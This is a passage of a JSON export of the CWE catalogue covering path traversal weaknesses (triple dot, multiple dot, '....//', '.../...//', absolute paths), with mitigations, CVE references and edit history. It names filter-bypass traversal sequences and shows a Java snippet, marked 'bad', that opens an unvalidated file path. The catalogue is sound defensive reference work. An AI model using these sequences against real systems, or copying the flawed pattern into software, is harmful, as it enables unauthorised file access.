Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - Directory Doubled Dot Dot Backslash - \'directory\\\\..\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Traversal: \'dir\\\\..\\\\filename\'","attr":{"@_Date":"2008-10-14"}}]}},"32":{"attr":{"@_ID":"32","@_Name":"Path Traversal: \'...\' (Triple Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'...\' (triple dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'...\' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to \\"..\\\\..\\" and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of \\"./\\" sequences, can ultimately produce valid \\"..\\" sequences due to a collapse into unsafe value (CWE-182)."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0467","Description":"\\"\\\\...\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"},{"Reference":"CVE-2001-0963","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963"},{"Reference":"CVE-2001-1193","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193"},{"Reference":"CVE-2001-1131","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131"},{"Reference":"CVE-2001-0480","Description":"read of arbitrary files and directories using GET or CD with \\"...\\" in Windows-based FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480"},{"Reference":"CVE-2002-0288","Description":"read files using \\".\\" and Unicode-encoded \\"/\\" or \\"\\\\\\" characters in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288"},{"Reference":"CVE-2003-0313","Description":"Directory listing of web server using \\"...\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313"},{"Reference":"CVE-2005-1658","Description":"Triple dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'...\' (triple dot)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"This manipulation-focused entry is currently hiding two distinct weaknesses, so it might need to be split. The manipulation is effective in two different contexts:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["it is equivalent to \\"..\\\\..\\" on Windows, or","it can take advantage of incomplete filtering, e.g. if the programmer does a single-pass removal of \\"./\\" in a string (collapse of data into unsafe value, CWE-182)."]}}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Triple Dot - \'...\'","attr":{"@_Date":"2008-04-11"}}}},"33":{"attr":{"@_ID":"33","@_Name":"Path Traversal: \'....\' (Multiple Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'....\' (multiple dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'....\' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to \\"..\\\\..\\\\..\\" and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of \\"./\\" sequences, can ultimately produce valid \\"..\\" sequences due to a collapse into unsafe value (CWE-182)."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0240","Description":"read files via \\"/........../\\" in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240"},{"Reference":"CVE-2000-0773","Description":"read files via \\"....\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773"},{"Reference":"CVE-1999-1082","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082"},{"Reference":"CVE-2004-2121","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2001-0491","Description":"multiple attacks using \\"..\\", \\"...\\", and \\"....\\" in different commands","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'....\' (multiple dot)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"Like the triple-dot CWE-32, this manipulation probably hides multiple weaknesses that should be made more explicit.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Dot - \'....\'","attr":{"@_Date":"2008-04-11"}}}},"34":{"attr":{"@_ID":"34","@_Name":"Path Traversal: \'....//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'....//\' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'....//\' manipulation is useful for bypassing some path traversal protection schemes. If \\"../\\" is filtered in a sequential fashion, as done by some regular expression engines, then \\"....//\\" can collapse into the \\"../\\" unsafe value (CWE-182). It could also be useful when \\"..\\" is removed, if the operating system treats \\"//\\" and \\"/\\" as equivalent."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1670","Description":"Mail server allows remote attackers to create arbitrary directories via a \\"..\\" or rename arbitrary files via a \\"....//\\" in user supplied parameters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'....//\' (doubled dot dot slash)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"This could occur due to a cleansing error that removes a single \\"../\\" from \\"....//\\"","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Doubled Dot Dot Slash - \'....//\'","attr":{"@_Date":"2008-04-11"}}}},"35":{"attr":{"@_ID":"35","@_Name":"Path Traversal: \'.../...//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'.../...//\' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'.../...//\' manipulation is useful for bypassing some path traversal protection schemes. If \\"../\\" is filtered in a sequential fashion, as done by some regular expression engines, then \\".../...//\\" can collapse into the \\"../\\" unsafe value (CWE-182). Removing the first \\"../\\" yields \\"....//\\"; the second removal yields \\"../\\". Depending on the algorithm, the software could be susceptible to CWE-34 but not CWE-35, or vice versa."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2169","Description":"chain: \\".../...//\\" bypasses protection mechanism using regexp\'s that remove \\"../\\" resulting in collapse into an unsafe value \\"../\\" (CWE-182) and resultant path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0202","Description":"\\".../....///\\" bypasses regexp\'s that remove \\"./\\" and \\"../\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'.../...//\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Doubled Triple Dot Slash - \'.../...//\'","attr":{"@_Date":"2008-04-11"}}}},"36":{"attr":{"@_ID":"36","@_Name":"Absolute Path Traversal","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as \\"/abs/path\\" that can resolve to a location that is outside of that directory.","Extended_Description":"This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-18"},"Intro_Text":"In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String filename = System.getProperty(\\"com.domain.application.dictionaryFile\\");File dictionaryFile = new File(filename);","xhtml:br":""}},"Body_Text":"However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating 